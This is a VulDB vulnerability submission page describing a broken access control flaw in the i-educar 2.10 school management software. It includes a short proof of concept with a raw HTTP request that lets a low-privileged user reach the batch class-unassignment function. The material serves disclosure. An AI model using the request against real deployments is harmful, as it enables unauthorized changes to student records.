提出 #644134: Portabilis i-educar 2.10 Broken Access Control情報

タイトル	Portabilis i-educar 2.10 Broken Access Control
説明	# Broken Access Control in `/cancelar-enturmacao-em-lote/[ID]` Endpoint --- ## Summary A Broken Access Control vulnerability was identified in the `/cancelar-enturmacao-em-lote/[ID]` endpoint of the _i-educar_ application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks. --- ## Details Vulnerable Endpoint: `GET cancelar-enturmacao-em-lote/[ID]` Authentication: Required The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for . --- ## PoC 1. Authenticate as a non-privileged user. ![[Pasted image 20250821190942.png]] ![[Pasted image 20250821191019.png]] 2. Send the following request:: ``` GET /cancelar-enturmacao-em-lote/15 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Referer: http://localhost/enturmacao-em-lote/15 Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i ``` 3. We could observe that we have access to the page and to the function to batch unassign students from classes. And, this user, should not do that. ![[Pasted image 20250821195629.png]] --- ## Impact Broken Access Control vulnerabilities can have severe consequences, including: - Unauthorized access to restricted functionality - Escalation of privileges for low-level users - Exposure of sensitive data and potential system compromise - Loss of confidentiality and integrity of educational records - Reputational damage to the organization
ソース	⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/Broken%20Access%20Control%20Vulnerability%20%20in%20%60.cancelar-enturmacao-em-lote.(ID)%60%20Endpoint.md
ユーザー	marceloQz (UID 87549)
送信	2025年08月29日 16:24 (8 月 ago)
モデレーション	2025年09月07日 13:45 (9 days later)
ステータス	承諾済み
VulDBエントリ	323019 [Portabilis i-Educar 迄 2.10 cancelar-enturmacao-em-lote 特権昇格]
ポイント	20

◂ 前概要次 ▸

Want to know what is going to be exploited?

We predict KEV entries!